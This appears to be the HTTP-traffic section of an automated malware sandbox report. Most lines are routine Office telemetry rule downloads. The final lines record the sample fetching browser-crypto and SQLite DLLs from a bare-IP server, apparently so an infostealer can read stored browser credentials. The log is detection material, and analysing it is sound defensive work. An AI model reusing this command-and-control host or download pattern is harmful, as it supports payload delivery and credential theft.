Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
